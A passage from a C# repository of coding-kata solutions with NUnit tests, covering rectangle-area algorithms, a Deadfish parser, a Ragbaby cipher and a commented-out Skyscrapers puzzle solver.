List<int[]> rectanglesList = rectangles.OrderBy(r => r[X1]).ToList();
return CheckRemaining(rectanglesList, 0);
}
private static int CheckRemaining(List<int[]> rectangles, int currentIndex)
{
int remainingCount = rectangles.Count - currentIndex;
if (remainingCount == 0) return 0;
int[] rectangle1 = rectangles[currentIndex];
int rectangle1Area = (rectangle1[X2] - rectangle1[X1]) * (rectangle1[Y2] - rectangle1[Y1]);
if (remainingCount == 1) return rectangle1Area;
int nextIndex = currentIndex + 1;
List<int[]> intersectionRectangles = new List<int[]>();
foreach (var rectangle2 in rectangles.Skip(nextIndex))
{
if (rectangle2[X1] >= rectangle1[X2]) break;
int y1, y2;
if (IntersectionCordinates(rectangle1[Y1], rectangle1[Y2], rectangle2[Y1], rectangle2[Y2], out y1, out y2) > 0)
{
intersectionRectangles.Add(new []{ rectangle2[X1], y1, rectangle2[X2] <= rectangle1[X2] ? rectangle2[X2] : rectangle1[X2], y2});
}
}
int netArea = rectangle1Area - CheckRemaining( intersectionRectangles, 0);
netArea += CheckRemaining(rectangles, nextIndex);
return netArea;
}
private static int IntersectionCordinates(int bottom1, int top1, int bottom2, int top2, out int bottom, out int top)
{
if (bottom2 >= bottom1)
{
if (bottom2 >= top1)
{
bottom = 0;
top = 0;
return 0;
}
bottom = bottom2;
top = top2 <= top1 ? top2 : top1;
}
else
{
if (top2 <= bottom1)
{
bottom = 0;
top = 0;
return 0;
}
bottom = bottom1;
top = top1 <= top2 ? top1 : top2;
}
return top - bottom;
}
}
class TotalAreaCoveredByRectangles2
{
private const int X1 = 0;
private const int Y1 = 1;
private const int X2 = 2;
private const int Y2 = 3;
public static int Calculate(IEnumerable<int[]> rectangles)
{
List<int[]> rectanglesList = rectangles.OrderBy(r => r[X1]).ToList();
return CheckRemaining(rectanglesList, 0);
}
private static int CheckRemaining(List<int[]> rectangles, int currentIndex)
{
if (currentIndex >= rectangles.Count) return 0;
int[] rectangle1 = rectangles[currentIndex];
int nextIndex = currentIndex + 1;
int intersectionArea = 0;
foreach (var rectangle2 in rectangles.Skip(nextIndex))
{
if (rectangle2[X1] >= rectangle1[X2]) break;
intersectionArea += ((rectangle2[X2] <= rectangle1[X2] ? rectangle2[X2] : rectangle1[X2]) - rectangle2[X1]) * IntersectionLength(rectangle1[Y1], rectangle1[Y2], rectangle2[Y1], rectangle2[Y2]);
}
int netArea = (rectangle1[X2] - rectangle1[X1]) * (rectangle1[Y2] - rectangle1[Y1]) - intersectionArea;
netArea += CheckRemaining(rectangles, nextIndex);
return netArea;
}
private static int IntersectionLength(int bottom1, int top1, int bottom2, int top2)
{
int bottom, top;
if (bottom2 >= bottom1)
{
if (bottom2 >= top1) return 0;
bottom = bottom2;
top = top2 <= top1 ? top2 : top1;
}
else
{
if (top2 <= bottom1) return 0;
bottom = bottom1;
top = top1 <= top2 ? top1 : top2;
}
return top - bottom;
}
}
class TotalAreaCoveredByRectangles1
{
public static int Calculate(IEnumerable<int[]> rectangles)
{
List<int[]> rectanglesList = rectangles.ToList();
return CheckRemaining(rectanglesList, 0);
}
private static int CheckRemaining(List<int[]> rectangles, int currentIndex)
{
if (currentIndex >= rectangles.Count) return 0;
int[] c = rectangles[currentIndex++];
int intersectionArea = 0;
foreach (var r in rectangles.Skip(currentIndex))
intersectionArea += IntersectionLength(c[0], c[2], r[0], r[2]) * IntersectionLength(c[1], c[3], r[1], r[3]);
int netArea = (c[2] - c[0]) * (c[3] - c[1]) - intersectionArea;
netArea += CheckRemaining(rectangles, currentIndex);
return netArea;
}
private static int IntersectionLength(int a1, int a2, int b1, int b2)
{
int x0, x1;
if (b1 >= a1)
{
if (b1 >= a2) return 0;
x0 = b1;
x1 = b2 <= a2 ? b2 : a2;
}
else
{
if (b2 <= a1) return 0;
x0 = a1;
x1 = a2 <= b2 ? a2 : b2;
}
return x1 - x0;
}
private const int X0 = 0;
private const int Y0 = 1;
private const int X1 = 2;
private const int Y1 = 3;
private static int Intersection1(int[] rectangle1, int[] rectangle2)
{
int x0, y0, x1, y1;
if (rectangle2[X0] >= rectangle1[X0])
{
if (rectangle2[X0] >= rectangle1[X1]) return 0;
x0 = rectangle2[X0];
x1 = rectangle2[X1] <= rectangle1[X1] ? rectangle2[X1] : rectangle1[X1];
}
else
{
if (rectangle2[X1] <= rectangle1[X0]) return 0;
x0 = rectangle1[X0];
x1 = rectangle1[X1] <= rectangle2[X1] ? rectangle1[X1] : rectangle2[X1];
}
if (rectangle2[Y0] >= rectangle1[Y0])
{
if (rectangle2[Y0] >= rectangle1[Y1]) return 0;
y0 = rectangle2[Y0];
y1 = rectangle2[Y1] <= rectangle1[Y1] ? rectangle2[Y1] : rectangle1[Y1];
}
else
{
if (rectangle2[Y1] <= rectangle1[Y0]) return 0;
y0 = rectangle1[Y0];
y1 = rectangle1[Y1] <= rectangle2[Y1] ? rectangle1[Y1] : rectangle2[Y1];
}
return (x1 - x0) * (y1 - y0);
}
public static int Calculate3(IEnumerable<int[]> rectangles)
{
int x0 = 0;
int y0 = 1;
int x1 = 2;
int y1 = 3;
Dictionary<int, List<int[]>> squares = new Dictionary<int, List<int[]>>();
foreach (int[] rectangle in rectangles.OrderBy(r => r[y0]))
{
for (int x = rectangle[x0]; x < rectangle[x1]; x++)
{
List<int[]> yPatches;
squares.TryGetValue(x, out yPatches);
if (yPatches == null)
{
yPatches = new List<int[]>(new[] {new[] {0, 0}});
squares.Add(x, yPatches);
}
int[] lastPatch = yPatches[yPatches.Count-1];
if (rectangle[y1] <= lastPatch[1]) continue;
if (rectangle[y0] <= lastPatch[1])
{
lastPatch[1] = rectangle[y1];
}
else
{
yPatches.Add(new[] {rectangle[y0], rectangle[y1]});
}
}
}
int area = 0;
foreach (List<int[]> yPatches in squares.Values)
{
foreach (int[] yPatch in yPatches)
{
area += yPatch[1] - yPatch[0];
}
}
return area;
}
public static int Calculate2(IEnumerable<int[]> rectangles)
{
SortedDictionary<int, LinkedList<int[]>> squares = new SortedDictionary<int, LinkedList<int[]>>();
foreach (int[] rectangle in rectangles)
{
for (int x = rectangle[0]; x < rectangle[2]; x++)
{
LinkedList<int[]> yPatches;
squares.TryGetValue(x, out yPatches);
if (yPatches == null)
{
yPatches = new LinkedList<int[]>();
squares.Add(x, yPatches);
}
yPatches.AddFirst(new LinkedListNode<int[]>(new[] {rectangle[1], rectangle[3]}));
LinkedListNode<int[]> currentNode = yPatches.First;
while (currentNode != null)
{
LinkedListNode<int[]> nextNode = currentNode.Next;
if (nextNode == null)
{
break;
}
if (currentNode.Value[1] < nextNode.Value[0])
{
break;
}
if (currentNode.Value[1] < nextNode.Value[1])
{
if (currentNode.Value[0] < nextNode.Value[0])
{
currentNode.Value[1] = nextNode.Value[1];
yPatches.Remove(nextNode);
}
else
{
yPatches.Remove(currentNode);
}
break;
}
if (currentNode.Value[0] < nextNode.Value[0])
{
yPatches.Remove(nextNode);
}
else if (currentNode.Value[0] < nextNode.Value[1])
{
currentNode.Value[0] = nextNode.Value[0];
yPatches.Remove(nextNode);
}
else
{
yPatches.AddAfter(nextNode, new LinkedListNode<int[]>(currentNode.Value));
yPatches.Remove(currentNode);
currentNode = nextNode.Next;
}
}
}
}
int area = 0;
foreach (LinkedList<int[]> yPatches in squares.Values)
{
foreach (int[] yPatch in yPatches)
{
area += yPatch[1] - yPatch[0];
}
}
return area;
}
public static int Calculate1(IEnumerable<int[]> rectangles)
{
SortedDictionary<int, SortedSet<int>> squares = new SortedDictionary<int, SortedSet<int>>();
foreach (int[] rectangle in rectangles)
{
for (int x = rectangle[0]; x < rectangle[2]; x++)
{
SortedSet<int> ySet;
squares.TryGetValue(x, out ySet);
if (ySet == null)
{
ySet = new SortedSet<int>();
squares.Add(x, ySet);
}
for (int y = rectangle[1]; y < rectangle[3]; y++)
{
ySet.Add(y);
}
}
}
int area = 0;
foreach (SortedSet<int> ySet in squares.Values)
{
area += ySet.Count;
}
return area;
}
}
[TestFixture]
class TotalAreaCoveredByRectanglesTests
{
[Test]
public void ZeroRectangles()
{
AreEqual(0, TotalAreaCoveredByRectangles.Calculate(Enumerable.Empty<int[]>()));
}
[Test]
public void OneRectangle()
{
AreEqual(1, TotalAreaCoveredByRectangles.Calculate(new[] { new[] { 0, 0, 1, 1 } }));
}
[Test]
public void OneRectangleV2()
{
AreEqual(22, TotalAreaCoveredByRectangles.Calculate(new[] { new[] { 0, 4, 11, 6 } }));
}
[Test]
public void TwoRectangles()
{
AreEqual(2, TotalAreaCoveredByRectangles.Calculate(new[] { new[] { 0, 0, 1, 1 }, new[] { 1, 1, 2, 2 } }));
}
[Test]
public void TwoRectanglesV2()
{
AreEqual(4, TotalAreaCoveredByRectangles.Calculate(new[] { new[] { 0, 0, 1, 1 }, new[] { 0, 0, 2, 2 } }));
}
[Test]
public void ThreeRectangles()
{
AreEqual(36, TotalAreaCoveredByRectangles.Calculate(new[] { new[] { 3, 3, 8, 5 }, new[] { 6, 3, 8, 9 }, new[] { 11, 6, 14, 12 } }));
}
[Test]
public void RectanglesWithSimpleIntersections()
{
AreEqual(5, TotalAreaCoveredByRectangles.Calculate(new[] {
new[] { 1,4,2,7 },
new[] { 1,4,2,6 },
new[] { 1,4,4,5 }}));
}
[Test]
public void RectanglesWithSimpleIntersections2()
{
AreEqual(1, TotalAreaCoveredByRectangles.Calculate(new[] {
new[] { 1,1,2,2 },
new[] { 1,1,2,2 },
new[] { 1,1,2,2 }}));
}
[Test]
public void RectanglesWithSimpleIntersections1()
{
AreEqual(21, TotalAreaCoveredByRectangles.Calculate(new[] { new[] { 1,1,2,2 },
new[] { 1,4,2,7 },
new[] { 1,4,2,6 },
new[] { 1,4,4,5 },
new[] { 2,5,6,7 },
new[] { 4,3,7,6}}));
}
}
}
<file_sep>/ConsoleApplication1/ConsoleApplication1/BaseClass1.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace ConsoleApplication1
{
class BaseClass1
{
public virtual int MyFunc(int i, int j)
{
Console.Out.Write("In class BaseClass1");
return 1;
}
}
}
<file_sep>/ConsoleApplication1/ConsoleApplication1/Deadfish.cs
using System.Collections.Generic;
using NUnit.Framework;
public class Deadfish
{
public static int[] Parse(string data)
{
List<int> numbers = new List<int>();
int number = 0;
foreach (char c in data)
{
if (c == 'i') number++;
else if (c == 'd') number--;
else if (c == 's') number *= number;
else if( c == 'o') numbers.Add(number);
}
return numbers.ToArray();
}
}
namespace Solution {
using NUnit.Framework;
using System;
[TestFixture]
public class SolutionTest
{
private static object[] sampleTestCases = new object[]
{
new object[] {"iiisdoso", new int[] {8, 64}},
new object[] {"iiisdosodddddiso", new int[] {8, 64, 3600}},
};
[Test, TestCaseSource("sampleTestCases")]
public void SampleTest(string data, int[] expected)
{
Assert.AreEqual(expected, Deadfish.Parse(data));
}
}
}<file_sep>/ConsoleApplication1/ConsoleApplication1/CamelCaseToUnderscore.cs
using System.Linq;
using NUnit.Framework;
namespace ConsoleApplication1
{
public static class CamelCaseTranslator
{
public static string ToUnderScore(string name)
{
if (string.IsNullOrEmpty(name)) return name;
return name.Substring(1).Aggregate(name[0].ToString(),
(a, b) => a + ((char.IsUpper(b) || char.IsNumber(b) && !char.IsNumber(a.LastOrDefault())) && a.LastOrDefault() != '_' ? "_" : "") + b);
}
}
[TestFixture]
public class CamelCaseTranslatorTests
{
[Test]
public void SimpleUnitNameTests()
{
Assert.AreEqual("This_Is_A_Unit_Test", CamelCaseTranslator.ToUnderScore("ThisIsAUnitTest"));
Assert.AreEqual("This_Should_Be_Splitted_Correct_Into_Underscore", CamelCaseTranslator.ToUnderScore("ThisShouldBeSplittedCorrectIntoUnderscore"));
}
[Test]
public void CalculationUnitNameTests()
{
Assert.AreEqual("Calculate_1_Plus_1_Equals_2", CamelCaseTranslator.ToUnderScore("Calculate1Plus1Equals2"));
Assert.AreEqual("Calculate_15_Plus_5_Equals_20", CamelCaseTranslator.ToUnderScore("Calculate15Plus5Equals20"));
Assert.AreEqual("Calculate_500_Divided_By_5_Equals_100", CamelCaseTranslator.ToUnderScore("Calculate500DividedBy5Equals100"));
}
[Test]
public void SpecialUnitNameTests()
{
Assert.AreEqual("This_Is_Already_Splitted_Correct", CamelCaseTranslator.ToUnderScore("This_Is_Already_Splitted_Correct"));
Assert.AreEqual("This_Is_Not_Splitted_Correct", CamelCaseTranslator.ToUnderScore("ThisIs_Not_SplittedCorrect"));
}
}
}
<file_sep>/ConsoleApplication1/ConsoleApplication1/GoingToZeroOrToInfinity.cs
using System;
using System.Linq;
using ConsoleApplication1;
using NUnit.Framework;
namespace ConsoleApplication1
{
class GoingToZeroOrToInfinity
{
public static double going(int n)
{
Console.WriteLine(n);
double factorialSum = 0;
for (int i = 1; i <= n; i++)
{
factorialSum += 1 / FI_DEV_FN(i,n);
}
return Math.Round(factorialSum, 6);
}
private static double FI_DEV_FN(int n, int d)
{
double retVal = 1;
for(int i = n + 1; i<=d; i++)
retVal *= i;
return retVal;
}
}
}
[TestFixture]
public class SuiteTests
{
[Test]
public void Test01()
{
Assert.AreEqual(1.275, GoingToZeroOrToInfinity.going(5));
}
[Test]
public void Test02()
{
Assert.AreEqual(1.2125, GoingToZeroOrToInfinity.going(6));
}
[Test]
public void Test03()
{
Assert.AreEqual(1.173214, GoingToZeroOrToInfinity.going(7));
}
}
<file_sep>/ConsoleApplication1/ConsoleApplication1/MultiplesOf3Or5.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using NUnit.Framework;
namespace ConsoleApplication1
{
class MultiplesOf3Or5
{
public static int Solution(int value)
{
int sum = 0;
int factor = 1;
while(3 * factor < value)
{
sum += 3 * factor;
factor++;
}
factor = 1;
while (5 * factor < value)
{
sum += 5 * factor;
factor++;
}
factor = 1;
while (15 * factor < value)
{
sum -= 15 * factor;
factor++;
}
return sum;
}
[Test]
public void Test()
{
Assert.AreEqual(23, Solution(10));
}
}
}
<file_sep>/ConsoleApplication1/ConsoleApplication1/FormatWordsIntoASentence.cs
using System.Collections.Generic;
using System.Linq;
using NUnit.Framework;
namespace ConsoleApplication1
{
class FormatWordsIntoASentence
{
public static string FormatWords(string[] words)
{
if(words == null) return string.Empty;
List<string> filterEmpty = words.Where(x => !string.IsNullOrWhiteSpace(x)).ToList();
List<string> exceptLast = new List<string>(filterEmpty);
if(exceptLast.Count > 1) exceptLast.RemoveAt(exceptLast.Count-1);
string retVal = exceptLast.Any() ? exceptLast.Aggregate((a, b) => a + ", " + b) : string.Empty;
if (filterEmpty.Count > 1)
return retVal + " and " + filterEmpty.Last();
return retVal;
}
}
[TestFixture]
public class Sample_Tests
{
private static IEnumerable<TestCaseData> testCases
{
get
{
yield return new TestCaseData(new[] { new string[] { "one", "two", "three", "four" } })
.Returns("one, two, three and four")
.SetDescription("{\"one\", \"two\", \"three\", \"four\"} should return \"one, two, three and four\"");
yield return new TestCaseData(new[] { new string[] { "one" } })
.Returns("one")
.SetDescription("{\"one\"} should return \"one\"");
yield return new TestCaseData(new[] { new string[] { "one", "", "three" } })
.Returns("one and three")
.SetDescription("{\"one\", \"\", \"three\"} should return \"one and three\"");
yield return new TestCaseData(new[] { new string[] { "", "", "three" } })
.Returns("three")
.SetDescription("{\"\", \"\", \"three\"} should return \"three\"");
yield return new TestCaseData(new[] { new string[] { "one", "two", "" } })
.Returns("one and two")
.SetDescription("{\"one\", \"two\", \"\"} should return \"one and two\"");
yield return new TestCaseData(new[] { new string[] { } })
.Returns("")
.SetDescription("{} should return \"\"");
yield return new TestCaseData(null)
.Returns("")
.SetDescription("null should return \"\"");
yield return new TestCaseData(new[] { new string[] { "" } })
.Returns("")
.SetDescription("{\"\"} should return \"\"");
}
}
[Test, TestCaseSource("testCases")]
public string Test(string[] words) => FormatWordsIntoASentence.FormatWords(words);
}
}
<file_sep>/ConsoleApplication1/ConsoleApplication1/IsInteresting.cs
using System;
using System.Collections.Generic;
using System.Linq;
using NUnit.Framework;
namespace ConsoleApplication1
{
partial class Kata
{
public static int IsInteresting(int number, List<int> awesomePhrases)
{
if (IsInterestingNumer(number, awesomePhrases)) return 2;
if (IsInterestingNumer(number+1, awesomePhrases)) return 1;
if (IsInterestingNumer(number+2, awesomePhrases)) return 1;
return 0;
}
private static bool IsInterestingNumer(int number, List<int> awesomePhrases)
{
if (number < 100) return false;
var digits = GetDigits(number);
List<int> interestingNumbers = new List<int>();
interestingNumbers.Add((int) (digits.First() * Math.Pow(10, digits.Count - 1)));
interestingNumbers.Add(digits.Aggregate((a, b) => a * 10 + a % 10)); //11111
if (digits.Count <= 10 - digits.First() + 1)
interestingNumbers.Add(digits.Aggregate((a, b) => a * 10 + (a % 10 + 1) % 10)); //1234
if (digits.Count <= digits.First() + 1)
interestingNumbers.Add(digits.Aggregate((a, b) => a * 10 + a % 10 - 1)); //43210
if (interestingNumbers.Contains(number)) return true;
if (IsPalindrome(digits)) return true;
if (awesomePhrases.Contains(number)) return true;
return false;
}
private static List<int> GetDigits(int number)
{
List<int> digits = new List<int>();
while (number > 0)
{
digits.Add(number % 10);
number = number / 10;
}
digits.Reverse();
return digits;
}
private static bool IsPalindrome(List<int> digits)
{
int count = digits.Count;
int middleCount = count/2;
for (int i = 0; i < middleCount; i++)
{
if (digits[i] != digits[count - 1 - i]) return false;
}
return true;
}
}
[TestFixture]
public class Test
{
[Test]
public void ShouldWorkTest()
{
Assert.AreEqual(1, Kata.IsInteresting(98, new List<int>() { 1337, 256 }));
Assert.AreEqual(2, Kata.IsInteresting(3210, new List<int>() { 1337, 256 }));
Assert.AreEqual(2, Kata.IsInteresting(67890, new List<int>() { 1337, 256 }));
Assert.AreEqual(2, Kata.IsInteresting(9999999, new List<int>() { 1337, 256 }));
Assert.AreEqual(0, Kata.IsInteresting(3, new List<int>() { 1337, 256 }));
Assert.AreEqual(1, Kata.IsInteresting(1336, new List<int>() { 1337, 256 }));
Assert.AreEqual(2, Kata.IsInteresting(1337, new List<int>() { 1337, 256 }));
Assert.AreEqual(2, Kata.IsInteresting(2000, new List<int>() { 1337, 256 }));
Assert.AreEqual(2, Kata.IsInteresting(1234, new List<int>() { 1337, 256 }));
Assert.AreEqual(2, Kata.IsInteresting(12321, new List<int>() { 1337, 256 }));
Assert.AreEqual(0, Kata.IsInteresting(11208, new List<int>() { 1337, 256 }));
Assert.AreEqual(1, Kata.IsInteresting(11209, new List<int>() { 1337, 256 }));
Assert.AreEqual(2, Kata.IsInteresting(11211, new List<int>() { 1337, 256 }));
}
}
}
<file_sep>/ConsoleApplication1/ConsoleApplication1/Test1.cs
using System;
using System.Collections;
using System.Collections.Generic;
using Castle.Core.Internal;
using NUnit.Framework;
namespace MySpace123
{
[TestFixture]
public class MyTest123
{
[Test]
public void Test11()
{
foreach (var myString in GetMyStrings(false)) Console.WriteLine(myString);
}
private IEnumerable<string> GetMyStrings(bool yieldReturn)
{
if (yieldReturn)
yield return "MyString";
}
[Test]
public void Test22()
{
MyClass obj1 = new MyClass(5);
MyClass obj2 = obj1;
obj2.i = 7;
Assert.AreEqual(5, obj1.i);
}
[Test]
public void Test33()
{
Assert.Fail(GetBinary(4).ToString());
}
private static int GetBinary(int value)
{
char[] binaryString = new[] {'1', '0', '1', '0'};
//binaryString[4 - value] = '1';
return Convert.ToInt32(string.Concat(binaryString), 2);
}
}
class MyClass
{
public int i;
public MyClass(int i)
{
this.i = i;
}
}
}
<file_sep>/ConsoleApplication1/ConsoleApplication1/Program.cs
using System.Collections.Generic;
using NUnit.Framework;
using System;
using Moq;
namespace ConsoleApplication1
{
public partial class Kata
{
static void Main(string[] args)
{
}
int MockMyFunc(int i , int j)
{
Console.Out.Write("In MockClass");
return 1;
}
[Test]
public void TestTest()
{
//BaseClass1 baseObj = new Derived11();
//baseObj.MyFunc();
Mock<BaseClass1> mockObj = new Mock<BaseClass1>();
mockObj.Setup(x => x.MyFunc(1, 4)).Returns(MockMyFunc(43, 54));
}
[Test]
public void EmptyTest()
{
Assert.AreEqual("", UniqueInOrder(""));
}
[Test]
public void Test1()
{
Assert.AreEqual("ABCDAB", UniqueInOrder("AAAABBBCCDAABBB"));
}
public static IEnumerable<T> UniqueInOrder<T>(IEnumerable<T> iterable)
{
T lastItem = default(T);
foreach (T x1 in iterable)
{
if (!x1.Equals(lastItem))
{
lastItem = x1;
yield return x1;
}
}
}
[Test]
public void BasicTests()
{
Assert.AreEqual(5000, CalculateScrap(new[] { 10 }, 90));
Assert.AreEqual(3820, CalculateScrap(new[] { 20, 10 }, 55));
}
public long CalculateScrap(int[] scraps, int numberOfRobots)
{
double ironNeededForLastStep = 50 * numberOfRobots;
foreach (int scrap in scraps)
{
ironNeededForLastStep = 100.0 * ironNeededForLastStep / (100 - scrap);
}
double roundedNumber = (long) ironNeededForLastStep;
if (ironNeededForLastStep > roundedNumber)
return (long)roundedNumber + 1;
return (long) ironNeededForLastStep + 1;
}
//****************
//Ragbaby cipher
//*****************
public static string Encode(string text, string key)
{
return Encode_Decode(text, key, IndexOfC_Encoding);
}
public static string Decode(string text, string key)
{
return Encode_Decode(text, key, IndexOfC_Decoding);
}
private static string Encode_Decode(string text, string key, Func<List<char>, char, int, int> indexOfC)
{
List<char> alphabets = KeyedAlphabets(key);
List<char> endocedString = new List<char>();
int j = 0;
foreach (char c in text)
{
j++;
char lowerC = c;
bool isUpper = false;
if (char.IsUpper(c))
{
lowerC = char.ToLower(c);
isUpper = true;
}
if (lowerC >= 'a' && lowerC <= 'z')
{
char encodedChar = alphabets[indexOfC(alphabets, lowerC, j)];
if (isUpper) encodedChar = char.ToUpper(encodedChar);
endocedString.Add(encodedChar);
}
else
{
endocedString.Add(c);
j = 0;
}
}
return new string(endocedString.ToArray());
}
private static int IndexOfC_Encoding(List<char> alphabets, char lowerC, int j)
{
int indexOfC = alphabets.IndexOf(lowerC) + j;
if (indexOfC >= 26) indexOfC = indexOfC - 26;
return indexOfC;
}
private static int IndexOfC_Decoding(List<char> alphabets, char lowerC, int j)
{
int indexOfC = alphabets.IndexOf(lowerC) - j;
if (indexOfC < 0) indexOfC = 26 + indexOfC;
return indexOfC;
}
private static List<char> KeyedAlphabets(string key)
{
HashSet<char> keyHash = new HashSet<char>();
List<char> alphabets = new List<char>();
foreach (char c in key)
{
if (keyHash.Add(c)) alphabets.Add(c);
}
for (char c = 'a'; c <= 'z'; c++)
{
if (!keyHash.Contains(c)) alphabets.Add(c);
}
return alphabets;
}
// List<char> alphabets = KeyedAlphabets(key);
// List<char> decodedString = new List<char>();
// int j = 0;
// foreach (char c in text)
// {
// j++;
// char lowerC = c;
// bool isUpper = false;
// if (char.IsUpper(c))
// {
// lowerC = char.ToLower(c);
// isUpper = true;
// }
// if (lowerC >= 'a' && lowerC <= 'z')
// {
// char encodedChar = alphabets[IndexOfC_Decoding(alphabets, lowerC, j)];
// if (isUpper) encodedChar = char.ToUpper(encodedChar);
// decodedString.Add(encodedChar);
// }
// else
// {
// decodedString.Add(c);
// j = 0;
// }
// }
// return new string(decodedString.ToArray());
//}
}
[TestFixture]
public class SolutionTest
{
[Test]
public void SampleTests()
{
Assert.AreEqual("ihrbfj", Kata.Encode("cipher", "cipher"));
Assert.AreEqual("ihrbfj", Kata.Encode("cipher", "cccciiiiippphheeeeerrrrr"));
Assert.AreEqual("Urew pu bq rzfsbtj.", Kata.Encode("This is an example.", "cipher"));
Assert.AreEqual("Urew.uRew.urEw.ureW...", Kata.Encode("This.tHis.thIs.thiS...", "cipher"));
Assert.AreEqual("cipher", Kata.Decode("ihrbfj", "cipher"));
Assert.AreEqual("This is an example.", Kata.Decode("Urew pu bq rzfsbtj.", "cipher"));
Assert.AreEqual("This.tHis.thIs.thiS...", Kata.Decode("Urew.uRew.urEw.ureW...", "cipher"));
Assert.AreEqual("This is an example.", Kata.Encode(Kata.Decode("This is an example.", "cipher"), "cipher"));
Assert.AreEqual("This is an example.", Kata.Decode(Kata.Encode("This is an example.", "cipher"), "cipher"));
}
}
}
<file_sep>/ConsoleApplication1/ConsoleApplication1/Derived11.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace ConsoleApplication1
{
class Derived11 : BaseClass1
{
//public new void MyFunc()
//{ Console.Out.Write("In class Derived11"); }
}
}
<file_sep>/ConsoleApplication1/ConsoleApplication1/Skyscrapers - Copy.cs
//using System;
//using System.Collections.Generic;
//using System.Diagnostics;
//using System.Linq;
//using NUnit.Framework;
//namespace ConsoleApplication1
//{
// //without print statements
// class Skyscrapers
// {
// public const int Size = 4;
// public static Cell[][] AllCells;
// internal class Cell
// {
// public int X;
// public int Y;
// public readonly List<int> PossibleValues = new List<int>(Enumerable.Range(1,Size));
// private int _valueSet;
// public Cell(int x, int y)
// {
// X = x;
// Y = y;
// }
// public void RemoveValue(int value)
// {
// if(!PossibleValues.Remove(value)) return;
// if (PossibleValues.Count == 1)
// {
// SetCellValue(PossibleValues.First());
// }
// EliminateValuesSingle(value);
// }
// private void EliminateValuesSingle(int value)
// {
// //Iterate over column and find if this value is present only in one cell then set value for that cell.
// Cell uniqueCell = null;
// for (int x = 0, y= Y; x < Size; x++)
// {
// Cell currCell = AllCells[x][y];
// if (currCell.PossibleValues.Contains(value))
// {
// if (uniqueCell != null)
// {
// uniqueCell = null;
// break;
// }
// uniqueCell = currCell;
// }
// }
// uniqueCell?.SetCellValue(value);
// //Iterate over rows
// uniqueCell = null;
// for (int x = X, y= 0; y < Size; y++)
// {
// Cell currCell = AllCells[x][y];
// if (currCell.PossibleValues.Contains(value))
// {
// if (uniqueCell != null)
// {
// uniqueCell = null;
// break;
// }
// uniqueCell = currCell;
// }
// }
// uniqueCell?.SetCellValue(value);
// }
// public void SetCellValue(int value)
// {
// if(_valueSet != 0) return;
// _valueSet = value;
// for (var i = 0; i < 4; i++)
// {
// if (i == value - 1) continue;
// RemoveValue(i+1);
// }
// foreach (int laneIndex in GetLanesContainingCell(this))
// {
// Lane lane = _allLanes[laneIndex];
// if(lane.Clue == 0) continue;
// if(this != lane.Cells.Last()) continue;
// int oldSize = lane.Cells.Count;
// int newSize = oldSize;
// for (; newSize > 0; newSize--)
// {
// if (lane.Cells[newSize-1]._valueSet == 0) break;
// }
// if(!lane.Cells.Where((c, i) => i > newSize-1 && c._valueSet == oldSize).Any()) return;
// int numberOfVisible = 1;
// int highestBuildingSize = lane.Cells[newSize]._valueSet;
// for (int j = newSize+1; j < oldSize; j++)
// {
// int currBuildingSize = lane.Cells[j]._valueSet;
// if (currBuildingSize > highestBuildingSize)
// {
// numberOfVisible++;
// highestBuildingSize = currBuildingSize;
// }
// }
// lane.Clue = lane.Clue > numberOfVisible ? lane.Clue - numberOfVisible : 0;
// lane.Cells.RemoveRange(newSize, oldSize-newSize);
// }
// for (int i = 0; i < 4; i++)
// {
// if (i == Y) continue;
// GetCell(X, i).RemoveValue(value);
// }
// for (int i = 0; i < 4; i++)
// {
// if (i == X) continue;
// GetCell(i, Y).RemoveValue(value);
// }
// }
// }
// private class Lane
// {
// public int Clue;
// public readonly List<Cell> Cells;
// public Lane(int clue, int index)
// {
// Clue = clue;
// Cells = GetLaneCells(index);
// }
// private static List<Cell> GetLaneCells(int index)
// {
// List<Cell> laneCells = new List<Cell>(Size);
// if (index < Size)
// {
// for (var i = 0; i < Size; i++)
// {
// laneCells.Add( GetCell(i, index ) );
// }
// }
// else if (index < 2 * Size)
// {
// for (var i = 0; i < Size; i++)
// {
// laneCells.Add( GetCell( index - Size, Size - i - 1 ) );
// }
// }
// else if (index < 3 * Size)
// {
// for (var i = 0; i < Size; i++)
// {
// laneCells.Add( GetCell( Size - i - 1, 3 * Size - index - 1 ) );
// }
// }
// else
// {
// for (var i = 0; i < Size; i++)
// {
// laneCells.Add( GetCell( 4 * Size - index - 1, i ) );
// }
// }
// return laneCells;
// }
// }
// private static Lane[] _allLanes;
// public static int[][] SolvePuzzle(int[] clues)
// {
// AllCells = new Cell[Size][];
// for (var i = 0; i < Size; i++)
// {
// AllCells[i] = new Cell[Size];
// for (var j = 0; j < Size; j++)
// {
// AllCells[i][j] = new Cell(i,j);
// }
// }
// _allLanes = new Lane[4*Size];
// for (var i = 0; i < clues.Length; i++)
// {
// _allLanes[i] = new Lane(clues[i], i);
// }
// for (int i = 0; i < 10; i++)
// {
// //Process clues
// foreach (Lane lane in _allLanes)
// {
// ProcessClues(lane);
// }
// if(AllCells.Count(r => r.Count(c => c.PossibleValues.Count != 1) != 0) == 0) break;
// }
// int [][] grid = new int[4][];
// for (var rowIndex = 0; rowIndex < 4; rowIndex++)
// {
// grid[rowIndex] = new int[4];
// for (var colIndex = 0; colIndex < 4; colIndex++)
// {
// grid[rowIndex][colIndex] = AllCells[rowIndex][colIndex].PossibleValues.Aggregate((a, b) => a + b);
// }
// }
// return grid;
// }
// private static bool ProcessClues(Lane lane)
// {
// int clue = lane.Clue;
// int size = lane.Cells.Count;
// if (clue == 0) return false;
// if (clue == 1)
// {
// lane.Cells[0].SetCellValue(lane.Cells[0].PossibleValues.Max());
// }
// else if (clue == size)
// {
// for (int i = 0; i < size; i++)
// {
// lane.Cells.ElementAtOrDefault(i)?.SetCellValue(i+1);
// }
// }
// else
// {
// if (clue == 2 && size > 1)
// {
// lane.Cells[1].RemoveValue(size-1);
// }
// for (int value = size; value > size - clue + 1; value--)
// {
// for (int i = 0; i < clue + value - size - 1; i++)
// {
// lane.Cells.ElementAtOrDefault(i)?.RemoveValue(value);
// }
// }
// }
// return true;
// }
// private static int[] GetLanesContainingCell(Cell cell)
// {
// return new [] {cell.Y, cell.X + Size, 3*Size - cell.Y -1, 4*Size - cell.X - 1};
// }
// private static Cell GetCell(int x, int y)
// {
// return AllCells[x][y];
// }
// }
// [TestFixture]
// public class SkyscrapersTests
// {
